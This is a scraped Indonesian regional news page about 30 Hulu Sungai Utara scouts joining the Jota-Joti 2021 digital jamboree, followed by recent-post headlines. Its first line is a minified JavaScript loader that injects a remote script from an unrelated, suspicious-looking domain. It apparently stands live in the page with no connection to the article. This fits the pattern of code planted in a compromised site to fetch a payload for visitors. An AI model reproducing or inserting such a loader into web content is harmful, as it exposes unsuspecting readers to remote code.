(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

30 Anggota Kwarcab Pramuka HSU Ikuti Jambore Jota – Joti Tahun 2021


KANALKALIMANTAN.COM, AMUNTAI – Sedikitnya 30 anggota Kwarcab Pramuka Hulu Sungai Utara (HSU) ikuti Jamboree On The Air (Jota) ke-84 dan Jamboree On The Internet (Joti) ke-42 tahun 2021 yang diselenggarakan Kwartir Nasional (Kwarnas) Gerakan Pramuka pada 15 – 17 Oktober 2021.

Jota Joti sendiri merupakan kegiatan tahunan kepanduan digital terbesar di dunia yang dikelola oleh World Organization of Scout Movement (WOSM).

“Saya berharap semoga kegiatan Jota Joti ini dapat dimanfaatkan semaksimal mungkin, mari kita timba ilmu dari kegiatan ini sehingga bisa bermanfaat baik untuk diri kita pribadi ataupun lingkungan kita,” kata Ketua Kwarcab Gerakan Pramuka HSU, H.Hermani Johan dalam sambutannya saat mengikuti kegiatan di Media Center Diskominfo HSU, Jumat (15/10/2021).

Hermani menjelaskan, kegiatan ini dilaksanakan rangka bertukar informasi dan pengetahuan, serta dapat berkomunikasi langsung dengan anggota pramuka luar daerah, dan dapat saling mengenal sekaligus bersilaturrahmi.

 

Baca juga : Polri Tangkap Jaringan Penagih Utang Pinjol Ilegal hingga Mengakibatkan Korban Bunuh Diri

Media radio amatir maupun internet merupakan salah satu jalan, untuk mendapatkan informasi terkait kepramukaan sebagai wadah saling tukar ilmu, pengetahuan dan keterampilan.

“Karena dikegiatan ini itu banyak diatur tata cara sebaik mungkin bagaimana tata cara kita memanfaatkan atau menggunakan media serta bagaimana cara kita berbicara atau berkomunikasi dengan orang, karena sebagaimanapun canggihnya peralatan kalau kita tidak mempunyai tata krama atau tidak bisa memanfaatkan sarana yang kita miliki itu akan sia-sia,” imbuhnya.

Hermani berharap dengan diselenggarakannya Jota Joti 2021 generasi muda khususnya pramuka mampu dibarisan depan untuk memfilter atau memberikan suatu contoh kepada masyarakat terutama dalam berkomunikasi.

“Tidak lupa pula saya ucapkan terima kasih kepada pemerintah kabupaten HSU yang sudah berkenan memfasilitasi kegiatan Jota Joti 2021 ini, juga kepada organisasi ORARI yang sudah membantu dalam pelaksanaannya,” pungkasnya. (kanalkalimantan.com/dew)

Reporter : dew
Editor : cell


Desy Arfianty

Recent Posts

Resmi! UMP Kalimantan Timur 2026 Naik 5,12%, Jadi Rp3,76 Juta

Upah Minimum Provinsi (UMP) Kalimantan Timur 2026 telah ditetapkan dan ditandatangani oleh Gubernur Rudy Mas’ud… Read More

6 jam ago

Tahun Baru Masalah Lama, Banjir Rendam Pemurus Dalam

KANALKALIMANTAN.COM, BANJARMASIN – Mengawali pergantian tahun, Kota Banjarmasin diguyur hujan dari pagi hingga petang, Kamis… Read More

20 jam ago

Tanpa Pesta Kembang Api, Puncak Batfest 2025 Meriah Dihentak Musisi Papan Atas

KANALKALIMANTAN.COM, BATULICIN - Meski tanpa pertunjukan pesta kembang api, malam pergantian tahun 2025 ke 2026… Read More

22 jam ago

UMK Banjarbaru Rp3,8 Juta, Lebih Besar dari UMP Kalsel

KANALKALIMANTAN.COM, BANJARBARU – Pemerintah Kota (Pemko) Banjarbaru mengumumkan Upah Minimum Kota (UMK) berdasarkan Keputusan Gubernur… Read More

1 hari ago

Tahun 2026 Bupati Sahrujani Berharap HSU Semakin “Bangkit’” ‎‎

KANALKALIMANTAN.COM, AMUNTAI – Bupati Hulu Sungai Utara (HSU) H Sahrujani mengharapkan agar Kabupaten HSU pada… Read More

1 hari ago

PWI Kalteng Gelar Konferda, PLN UPT Palangkaraya Terima Penghargaan Peduli Pers

KANALKALIMANTAN.COM, PALANGKARAYA - Persatuan Wartawan Indonesia (PWI) Provinsi Kalimantan Tengah menggelar Konferensi Kerja Daerah (Konferda)… Read More

2 hari ago

This website uses cookies.